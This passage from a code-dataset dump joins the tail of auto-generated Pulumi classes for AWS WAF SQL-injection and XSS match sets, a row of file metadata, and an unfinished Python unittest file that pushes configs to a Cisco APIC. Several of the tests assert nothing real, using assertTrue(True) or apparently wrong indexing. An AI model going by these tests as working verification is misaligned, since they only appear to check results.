    def text_transformation(self, value: pulumi.Input[str]):
        pulumi.set(self, "text_transformation", value)
@pulumi.input_type
class SqlInjectionMatchSetFieldToMatchArgs:
    """Nested ``field_to_match`` input args for a SQL Injection Match Set:
    required ``type`` plus optional ``data`` (stored only when supplied).
    Appears to be auto-generated Pulumi SDK code."""
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 data: Optional[pulumi.Input[str]] = None):
        pulumi.set(__self__, "type", type)
        if data is not None:
            pulumi.set(__self__, "data", data)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def data(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "data")

    @data.setter
    def data(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "data", value)
@pulumi.input_type
class SqlInjectionMatchSetSqlInjectionMatchTupleArgs:
    """Input args for one SQL-injection match tuple: required
    ``field_to_match`` (nested SqlInjectionMatchSetFieldToMatchArgs) and
    ``text_transformation`` (wire ``textTransformation``).
    Appears to be auto-generated Pulumi SDK code."""
    def __init__(__self__, *,
                 field_to_match: pulumi.Input['SqlInjectionMatchSetFieldToMatchArgs'],
                 text_transformation: pulumi.Input[str]):
        pulumi.set(__self__, "field_to_match", field_to_match)
        pulumi.set(__self__, "text_transformation", text_transformation)

    @property
    @pulumi.getter(name="fieldToMatch")
    def field_to_match(self) -> pulumi.Input['SqlInjectionMatchSetFieldToMatchArgs']:
        return pulumi.get(self, "field_to_match")

    @field_to_match.setter
    def field_to_match(self, value: pulumi.Input['SqlInjectionMatchSetFieldToMatchArgs']):
        pulumi.set(self, "field_to_match", value)

    @property
    @pulumi.getter(name="textTransformation")
    def text_transformation(self) -> pulumi.Input[str]:
        return pulumi.get(self, "text_transformation")

    @text_transformation.setter
    def text_transformation(self, value: pulumi.Input[str]):
        pulumi.set(self, "text_transformation", value)
@pulumi.input_type
class WebACLActionArgs:
    """Input args for a Web ACL action: a single required ``type`` string.
    Appears to be auto-generated Pulumi SDK code."""
    def __init__(__self__, *,
                 type: pulumi.Input[str]):
        pulumi.set(__self__, "type", type)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)
@pulumi.input_type
class WebACLRuleArgs:
    """Input args for one Web ACL rule: required ``action`` (nested
    WebACLActionArgs), integer ``priority``, and ``rule_id`` (wire
    ``ruleId``). Appears to be auto-generated Pulumi SDK code."""
    def __init__(__self__, *,
                 action: pulumi.Input['WebACLActionArgs'],
                 priority: pulumi.Input[int],
                 rule_id: pulumi.Input[str]):
        pulumi.set(__self__, "action", action)
        pulumi.set(__self__, "priority", priority)
        pulumi.set(__self__, "rule_id", rule_id)

    @property
    @pulumi.getter
    def action(self) -> pulumi.Input['WebACLActionArgs']:
        return pulumi.get(self, "action")

    @action.setter
    def action(self, value: pulumi.Input['WebACLActionArgs']):
        pulumi.set(self, "action", value)

    @property
    @pulumi.getter
    def priority(self) -> pulumi.Input[int]:
        return pulumi.get(self, "priority")

    @priority.setter
    def priority(self, value: pulumi.Input[int]):
        pulumi.set(self, "priority", value)

    @property
    @pulumi.getter(name="ruleId")
    def rule_id(self) -> pulumi.Input[str]:
        return pulumi.get(self, "rule_id")

    @rule_id.setter
    def rule_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "rule_id", value)
@pulumi.input_type
class XssMatchSetFieldToMatchArgs:
    """Nested ``field_to_match`` input args for an XSS Match Set: required
    ``type`` plus optional ``data`` (stored only when supplied).
    Appears to be auto-generated Pulumi SDK code."""
    def __init__(__self__, *,
                 type: pulumi.Input[str],
                 data: Optional[pulumi.Input[str]] = None):
        pulumi.set(__self__, "type", type)
        if data is not None:
            pulumi.set(__self__, "data", data)

    @property
    @pulumi.getter
    def type(self) -> pulumi.Input[str]:
        return pulumi.get(self, "type")

    @type.setter
    def type(self, value: pulumi.Input[str]):
        pulumi.set(self, "type", value)

    @property
    @pulumi.getter
    def data(self) -> Optional[pulumi.Input[str]]:
        return pulumi.get(self, "data")

    @data.setter
    def data(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "data", value)
@pulumi.input_type
class XssMatchSetXssMatchTupleArgs:
    """Input args for one XSS match tuple: required ``field_to_match``
    (nested XssMatchSetFieldToMatchArgs) and ``text_transformation``
    (wire ``textTransformation``). Appears to be auto-generated Pulumi SDK
    code."""
    def __init__(__self__, *,
                 field_to_match: pulumi.Input['XssMatchSetFieldToMatchArgs'],
                 text_transformation: pulumi.Input[str]):
        pulumi.set(__self__, "field_to_match", field_to_match)
        pulumi.set(__self__, "text_transformation", text_transformation)

    @property
    @pulumi.getter(name="fieldToMatch")
    def field_to_match(self) -> pulumi.Input['XssMatchSetFieldToMatchArgs']:
        return pulumi.get(self, "field_to_match")

    @field_to_match.setter
    def field_to_match(self, value: pulumi.Input['XssMatchSetFieldToMatchArgs']):
        pulumi.set(self, "field_to_match", value)

    @property
    @pulumi.getter(name="textTransformation")
    def text_transformation(self) -> pulumi.Input[str]:
        return pulumi.get(self, "text_transformation")

    @text_transformation.setter
    def text_transformation(self, value: pulumi.Input[str]):
        pulumi.set(self, "text_transformation", value)
| 31.364008
| 90
| 0.652214
| 1,716
| 15,337
| 5.57634
| 0.057692
| 0.136796
| 0.114119
| 0.069495
| 0.774271
| 0.720765
| 0.717316
| 0.705612
| 0.642491
| 0.634445
| 0
| 0.001757
| 0.220708
| 15,337
| 488
| 91
| 31.428279
| 0.798862
| 0.010497
| 0
| 0.710938
| 1
| 0
| 0.130125
| 0.049901
| 0
| 0
| 0
| 0
| 0
| 1
| 0.21875
| false
| 0
| 0.013021
| 0.091146
| 0.359375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1428a2cc593e28ad978a145fb05810b886c27fdb
| 116,101
|
py
|
Python
|
applications/configpush/apicservice_test.py
|
carterej1989/acitoolkit
|
8bc1e462c3bc0b6643004033e353520d438242d6
|
[
"Apache-2.0"
] | null | null | null |
applications/configpush/apicservice_test.py
|
carterej1989/acitoolkit
|
8bc1e462c3bc0b6643004033e353520d438242d6
|
[
"Apache-2.0"
] | 2
|
2018-05-07T19:40:50.000Z
|
2020-04-02T14:43:15.000Z
|
applications/configpush/apicservice_test.py
|
carterej1989/acitoolkit
|
8bc1e462c3bc0b6643004033e353520d438242d6
|
[
"Apache-2.0"
] | null | null | null |
"""
apicservice_test.py
"""
import json
import unittest
from apicservice import ApicService
from acitoolkit import (Tenant, Session, Filter, EPG, Contract, Context, ContractSubject, AppProfile, BridgeDomain,
AttributeCriterion, OutsideL3, OutsideEPG, OutsideNetwork, Session)
import sys
import time
from deepdiff import DeepDiff
import gzip
from pprint import pprint
import ast
try:
from apicservice_test_credentials import (LOGIN, PASSWORD, IPADDR)
except ImportError:
print '''
Please create a file called apicservice_test_credentials.py with the following:
IPADDR = ''
LOGIN = ''
PASSWORD = ''
'''
sys.exit(0)
class LoadConfig(object):
    """
    Helper that loads a configpush JSON config, opens an APIC session and
    feeds the config to an ApicService instance.

    Attributes (set by login()/load_configFile(); '' until then):
      config  -- parsed config dict with an 'apic' credentials section added
      session -- acitoolkit Session logged in to the APIC
      tool    -- the ApicService instance the config was pushed through
    """
    def __init__(self):
        self.config = ''
        self.session = ''
        self.tool = ''

    def login(self):
        """Build the credentials section and return a logged-in Session.

        Exits the process (sys.exit(0)) when the APIC login fails.
        """
        self.config = {}
        self.config['apic'] = {'user_name': LOGIN,
                               'password': PASSWORD,
                               'ip_address': IPADDR,
                               'use_https': False}
        session = Session(
            'http://' + self.config['apic']['ip_address'],
            self.config['apic']['user_name'],
            self.config['apic']['password'])
        resp = session.login()
        if not resp.ok:
            print('%% Could not login to APIC')
            sys.exit(0)
        return session

    def delete_tenant(self, tenant_name=''):
        """Delete the tenant named *tenant_name* from the APIC, if present.

        NOTE(review): this creates a fresh LoadConfig/session instead of
        reusing self.session -- presumably so it works before load_configFile
        has run; confirm before changing.
        """
        load_config = LoadConfig()
        session = load_config.login()
        tenants = Tenant.get(session)
        for tenant in tenants:
            if tenant.name == tenant_name:
                tenant.mark_as_deleted()
                resp = tenant.push_to_apic(session)
                if not resp.ok:
                    print "tenant deletion failed"

    def load_configFile(self, config_file, is_file=True, prompt=False, displayonly=False, tenant_name='configpush-test',
                        app_name='appProfile-test', l3ext_name='l3ext-test', useipEpgs=False):
        """
        Load a config, log in to the APIC and push the config via ApicService.

        :param config_file: path to a gzipped JSON file, or (when is_file is
            False) a JSON string
        :param is_file: treat config_file as a gzip path (True) or a raw
            JSON string (False)
        :param prompt: forwarded to ApicService.prompt
        :param displayonly: forwarded to ApicService.displayonly
        :param tenant_name: tenant to create/update on the APIC
        :param app_name: application profile name to use
        :param l3ext_name: external routed network (L3Out) name to use
        :param useipEpgs: when True, call ApicService.use_ip_epgs()
        """
        if is_file:
            with gzip.open(config_file, 'rb') as config_file:
                self.config = json.load(config_file)
        else:
            self.config = json.loads(config_file)
        # Credentials are injected here so test configs never contain them.
        self.config['apic'] = {'user_name': LOGIN,
                               'password': PASSWORD,
                               'ip_address': IPADDR,
                               'use_https': False}
        self.session = Session('http://' + self.config['apic']['ip_address'], self.config['apic']['user_name'],
                               self.config['apic']['password'])
        resp = self.session.login()
        if not resp.ok:
            print('%% Could not login to APIC')
            sys.exit(0)
        self.tool = ApicService()
        self.tool.displayonly = displayonly
        self.tool.prompt = prompt
        self.tool.set_tenant_name(tenant_name)
        self.tool.set_app_name(app_name)
        self.tool.set_l3ext_name(l3ext_name)
        if useipEpgs:
            self.tool.use_ip_epgs()
        resp = self.tool.add_config(self.config)
        if resp != 'OK':
            print "ERROR in config. " + resp
class TestConfigpush(unittest.TestCase):
"""
test case to push a contract config to APIC and update it in the next revision by changing some policies, filters, contracts
"""
    def test_initial_configpush(self):
        """
        initial test to configpush
        push a sample config with 2 clusters, 1 policy.
        check the tenant config after it is pushed to apic by tenant.get_deep()
        verify the num of children expected and existing in apic for this tenant
        """
        config_file = """
        {
            "clusters": [
                {
                    "name": "Configpushtest*-(1)",
                    "id": "56c55b8761707062b2d11b00",
                    "descr": "sample description",
                    "route_tag": {
                        "subnet_mask": "173.38.111.0/24",
                        "name": "rtp1-dcm01n-gp-db-dr2:iv2133"
                    },
                    "labels": [
                    ],
                    "nodes": [
                        {
                            "ip": "173.38.111.127",
                            "name": "lnxdb-dr-vm-421"
                        },
                        {
                            "ip": "173.38.111.131",
                            "name": "lnxdb-dr-vm-422"
                        }
                    ]
                },
                {
                    "name": "Configpushtest*-(2)",
                    "id": "56c3d31561707035c0c12b00",
                    "descr": "sample description",
                    "approved": true,
                    "route_tag": {
                        "subnet_mask": "0.0.0.0/0",
                        "name": "INTERNET-EXTNET"
                    },
                    "labels": [
                    ],
                    "nodes": [
                        {
                            "ip": "173.38.111.126",
                            "name": "lnxdb-dr-vm-423"
                        },
                        {
                            "ip": "173.38.111.128",
                            "name": "lnxdb-dr-vm-424"
                        }
                    ]
                }
            ],
            "policies": [
                {
                    "src": "56c55b8761707062b2d11b00",
                    "dst": "56c3d31561707035c0c12b00",
                    "src_name": "Configpushtest-policy*-(1)",
                    "dst_name": "Configpushtest-policy*-(2)",
                    "descr": "sample description",
                    "whitelist": [
                        {
                            "port": [
                                0,
                                0
                            ],
                            "proto": 1,
                            "action": "ALLOW"
                        },
                        {
                            "port": [
                                0,
                                0
                            ],
                            "proto": 6,
                            "action": "ALLOW"
                        }
                    ]
                }
            ]
        }
        """
        tenant_name = 'configpush-test'
        # First push just ensures the tenant exists so it can be deleted,
        # giving the second push a clean slate.
        load_config = LoadConfig()
        load_config.load_configFile(config_file, is_file=False)
        tenants = Tenant.get(load_config.session)
        for tenant in tenants:
            if tenant.name == tenant_name:
                tenant.mark_as_deleted()
                resp = tenant.push_to_apic(load_config.session)
                if not resp.ok:
                    print "tenant deletion failed"
        load_config = LoadConfig()
        load_config.load_configFile(config_file, is_file=False)
        # Give the APIC time to apply the pushed config before reading back.
        time.sleep(5)
        tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
        for tenant in tenants:
            if tenant.name == 'configpush-test':
                existing_filters = tenant.get_children(Filter)
                self.assertEquals(len(existing_filters), 2,
                                  "filter count did not match for the pushed config and existing config")
                app_profiles = tenant.get_children(AppProfile)
                app = app_profiles[0]
                self.assertEquals(
                    app.name,
                    'appProfile-test',
                    "application profile name didnot match with the default appProfile-test")
                outsideL3s = tenant.get_children(OutsideL3)
                self.assertEquals(
                    outsideL3s[0].name,
                    'l3ext-test',
                    "External routed network with default name doesnot exist l3ext-test")
                for outsideL3 in outsideL3s:
                    if outsideL3.name == 'l3ext-test':
                        outsideEpgs = outsideL3.get_children(OutsideEPG)
                        self.assertEquals(len(outsideEpgs), 0, "the num of outside epgs didnot match")
                existing_epgs = app.get_children(EPG)
                self.assertEquals(len(existing_epgs), 2,
                                  "epgs count did not match for the pushed config and existing config")
                # One EPG per cluster: cluster 1 consumes the contract,
                # cluster 2 provides it (matching the single src->dst policy).
                for existing_epg in existing_epgs:
                    self.assertEqual(existing_epg.is_attributed_based, False,
                                     "attribute based is true for EPG " + existing_epg.name)
                    if existing_epg.name == 'Configpushtest_-_1_-0':
                        self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                         "consumed EPG did not match for EPG " + existing_epg.name)
                        self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                         "provided EPG did not match for EPG " + existing_epg.name)
                    elif existing_epg.name == 'Configpushtest_-_2_-1':
                        self.assertEqual(len(existing_epg.get_all_consumed()), 0,
                                         "consumed EPG did not match for EPG " + existing_epg.name)
                        self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                         "provided EPG did not match for EPG " + existing_epg.name)
                existing_contracts = tenant.get_children(Contract)
                self.assertEquals(len(existing_contracts), 1,
                                  "contracts count did not match for the pushed config and existing config")
                for existing_contract in existing_contracts:
                    for child_contractSubject in existing_contract.get_children(ContractSubject):
                        self.assertEqual(len(child_contractSubject.get_filters()), 2,
                                         "num of filters in contract subject did not match " + child_contractSubject.name)
                existing_bds = tenant.get_children(BridgeDomain)
                self.assertEquals(len(existing_bds), 0,
                                  "bridgeDomains count did not match for the pushed config and existing config")
                existing_contexts = tenant.get_children(Context)
                self.assertEquals(len(existing_contexts), 0,
                                  "existing_contexts count did not match for the pushed config and existing config")
def test_tenantname_in_configpush(self):
"""
this should test the tenant name. the tenant name pushed and the existing tenant name should match.
to test this first i am deleting the tenant if exits and then push the config,test the tenant name of existing tenant.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tennat exists with name " + tenant_name)
    def test_tenantname_for_invalidname_in_configpush(self):
        """
        this should test the tenant name of tenant. the invalid characters in tenant name should be removed.
        to test this first i am deleting the tenant if exits and then push the config,the tenant name in existing config from APIC should have valid characters.
        """
        config_file = """
        {
            "clusters": [
                {
                    "name": "Configpushtest*-(1)",
                    "id": "56c55b8761707062b2d11b00",
                    "descr": "sample description",
                    "route_tag": {
                        "subnet_mask": "173.38.111.0/24",
                        "name": "rtp1-dcm01n-gp-db-dr2:iv2133"
                    },
                    "labels": [
                    ],
                    "nodes": [
                    ]
                },
                {
                    "name": "Configpushtest*-(2)",
                    "id": "56c3d31561707035c0c12b00",
                    "descr": "sample description",
                    "approved": true,
                    "route_tag": {
                        "subnet_mask": "0.0.0.0/0",
                        "name": "INTERNET-EXTNET"
                    },
                    "labels": [
                    ],
                    "nodes": [
                    ]
                }
            ],
            "policies": [
                {
                    "src": "56c55b8761707062b2d11b00",
                    "dst": "56c3d31561707035c0c12b00",
                    "src_name": "Configpushtest-policy*-(1)",
                    "dst_name": "Configpushtest-policy*-(2)",
                    "descr": "sample description",
                    "whitelist": [
                    ]
                }
            ]
        }
        """
        load_config = LoadConfig()
        # Deliberately invalid characters; the tool is expected to sanitize
        # them to underscores and truncate the name.
        tenant_name = 'configpush-test1**#####{{{{}}}}}$$$$$$######################abcdefgh'
        load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name)
        time.sleep(5)
        tenants = Tenant.get(load_config.session)
        for tenant in tenants:
            if tenant.name == tenant_name:
                tenant.mark_as_deleted()
                resp = tenant.push_to_apic(load_config.session)
                if not resp.ok:
                    print "tenant deletion failed"
        time.sleep(5)
        load_config = LoadConfig()
        # NOTE(review): this second push uses the default tenant name, so the
        # sanitized name checked below comes from the FIRST push -- confirm
        # this is intended.
        load_config.load_configFile(config_file, is_file=False)
        time.sleep(5)
        tenants = Tenant.get(load_config.session)# names=[load_config.tool.tenant_name])
        # NOTE(review): assertTrue(True, ...) can never fail; if the tenant is
        # missing the loop simply asserts nothing (vacuous test).
        for tenant in tenants:
            if tenant.name == "configpush-test1____________________________________________abc":
                self.assertTrue(True, "tennat exists with name " + tenant_name)
def test_appProfilename_in_configpush(self):
"""
this should test the application Profile name of tenant. the application Profile name pushed and the existing application Profile name should match.
to test this first i am deleting the tenant if exits and then push the config,the application Profile name in config and the application Profile name in existing tenant should match.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
app_name = 'app-test'
load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name, app_name=app_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tennat exists with name " + tenant_name)
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(app[0].name, app_name, "application profile with given name doesnot exist")
def test_appProfilename_for_invalidname_in_configpush(self):
"""
this should test the application Profile name of tenant. the invalid characters in application profile should be removed.
to test this first i am deleting the tenant if exits and then push the config,the application Profile name in existing config from APIC should have valid characters.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
app_name = 'app-test**-#.{}'
load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name, app_name=app_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tennat exists with name " + tenant_name)
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(app[0].name, "app-test**-_.__", "application profile with given name doesnot exist")
    def test_appProfilename_for_change_in_name_configpush(self):
        """
        this should test the application Profile name of tenant.push the same json with diferent --app name for the second time.
        so that the tenant should have the new application profile and the old one should be deleted
        """
        config_file = """
        {
            "clusters": [
                {
                    "name": "Configpushtest*-(1)",
                    "id": "56c55b8761707062b2d11b00",
                    "descr": "sample description",
                    "route_tag": {
                        "subnet_mask": "173.38.111.0/24",
                        "name": "rtp1-dcm01n-gp-db-dr2:iv2133"
                    },
                    "labels": [
                    ],
                    "nodes": [
                    ]
                },
                {
                    "name": "Configpushtest*-(2)",
                    "id": "56c3d31561707035c0c12b00",
                    "descr": "sample description",
                    "approved": true,
                    "route_tag": {
                        "subnet_mask": "0.0.0.0/0",
                        "name": "INTERNET-EXTNET"
                    },
                    "labels": [
                    ],
                    "nodes": [
                    ]
                }
            ],
            "policies": [
                {
                    "src": "56c55b8761707062b2d11b00",
                    "dst": "56c3d31561707035c0c12b00",
                    "src_name": "Configpushtest-policy*-(1)",
                    "dst_name": "Configpushtest-policy*-(2)",
                    "descr": "sample description",
                    "whitelist": [
                    ]
                }
            ]
        }
        """
        load_config = LoadConfig()
        tenant_name = 'configpush-test1'
        # First push: app name with invalid characters (sanitized below).
        app_name = 'app-test**-#.{}_changed'
        load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name, app_name=app_name)
        time.sleep(5)
        tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
        for tenant in tenants:
            if tenant.name == tenant_name:
                self.assertTrue(True, "tennat exists with name " + tenant_name)
                app_profiles = tenant.get_children(AppProfile)
                self.assertEqual(len(app_profiles), 1, "len(app_profiles)!=1")
                for app in app_profiles:
                    self.assertEquals(app.name, "app-test__-_.___changed", "application profile with name is not updated to the changed name")
        # Second push with a different app name: the docstring says the old
        # profile should be deleted, yet the assertion below expects TWO
        # profiles. NOTE(review): confirm which behavior is intended.
        app_name = 'app-test_second**-#.{}_changed'
        load_config.load_configFile(config_file, is_file=False, tenant_name=tenant_name, app_name=app_name)
        time.sleep(5)
        tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
        for tenant in tenants:
            if tenant.name == tenant_name:
                self.assertTrue(True, "tennat exists with name " + tenant_name)
                app_profiles = tenant.get_children(AppProfile)
                self.assertEqual(len(app_profiles), 2, "len(app_profiles)!=2")
def test_l3ext_name_in_configpush(self):
"""
this should test the external routed network name of tenant. the external routed network name pushed and the existing external routed network name should match.
to test this first i am deleting the tenant if exits and then push the config,the external routed network name in config and the external routed network name in existing tenant should match.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
app_name = 'app-test'
l3ext_name = 'l3external-test'
load_config.load_configFile(
config_file,
is_file=False,
tenant_name=tenant_name,
app_name=app_name,
l3ext_name=l3ext_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tenant exists with name " + tenant_name)
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(app[0].name, app_name, "application profile with given name doesnot exist" + app_name)
outsideL3s = tenant.get_children(OutsideL3)
self.assertEquals(
outsideL3s[0].name,
l3ext_name,
"External routed network with name doesnot exist" +
l3ext_name)
def test_l3ext_name_for_invalidname_in_configpush(self):
"""
this should test the external routed network name of tenant. the invalid characters in external routed network name should be removed.
to test this first i am deleting the tenant if exits and then push the config,the external routed network name in existing config from APIC should have valid characters.
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"route_tag": {
"subnet_mask": "173.38.111.0/24",
"name": "rtp1-dcm01n-gp-db-dr2:iv2133"
},
"labels": [
],
"nodes": [
]
},
{
"name": "Configpushtest*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "INTERNET-EXTNET"
},
"labels": [
],
"nodes": [
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
]
}
]
}
"""
load_config = LoadConfig()
tenant_name = 'configpush-test1'
app_name = 'app-test'
l3ext_name = 'l3external-test***#####:::{{{}}}}'
load_config.load_configFile(
config_file,
is_file=False,
tenant_name=tenant_name,
app_name=app_name,
l3ext_name=l3ext_name)
time.sleep(5)
tenants = Tenant.get(load_config.session)
for tenant in tenants:
if tenant.name == tenant_name:
tenant.mark_as_deleted()
resp = tenant.push_to_apic(load_config.session)
if not resp.ok:
print "tenant deletion failed"
time.sleep(5)
load_config = LoadConfig()
load_config.load_configFile(config_file, is_file=False)
time.sleep(5)
tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
for tenant in tenants:
if tenant.name == tenant_name:
self.assertTrue(True, "tenant exists with name " + tenant_name)
app_profiles = tenant.get_children(AppProfile)
app = app_profiles[0]
self.assertEquals(app[0].name, app_name, "application profile with given name doesnot exist" + app_name)
outsideL3s = tenant.get_children(OutsideL3)
print "outsideL3s[0].name is "+outsideL3s[0].name
self.assertEquals(
outsideL3s[0].name,
l3ext_name,
"External routed network with name doesnot exist" +
l3ext_name)
def test_manglenames_in_configpush(self):
"""
this should test the mangle_names method defined in apicserive.py.
which will make sure the length of the names of EPGS,Filters, app_profiles, nodes, contracts not to exceed 64 characters
and also replaces the invalid characters
"""
config_file = """
{
"clusters": [
{
"name": "Configpushtest_____..***()()()%%%%%%%%%%%%*_to_test_length_of_Cluster_name*-(1)",
"id": "56c55b8761707062b2d11b00",
"descr": "sample description",
"external": true,
"route_tag": {
"subnet_mask": "240.0.0.0/24",
"name": "mcast-net"
},
"labels": [
],
"nodes": [
{
"ip": "240.0.0.0",
"name": "240.0.0.0/24",
"prefix_len": 24
}
]
},
{
"name": "Configpushtest2____..***()()()%%%%%%%%%%%%*_to_test_length_of_Cluster_name*-(2)",
"id": "56c3d31561707035c0c12b00",
"descr": "sample description",
"approved": true,
"route_tag": {
"subnet_mask": "0.0.0.0/0",
"name": "N/A"
},
"labels": [
],
"nodes": [
{
"ip": "0.0.0.0",
"name": "0.0.0.0/0",
"prefix_len": 0
}
]
}
],
"policies": [
{
"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy1_____..***()()()%%%%%%%%%%%%*to_test_length_of_Cluster_name*-(1)",
"dst_name": "Configpushtest-policy2_____..***()()()%%%%%%%%%%%%*to_test_length_of_Cluster_name*-(2)",
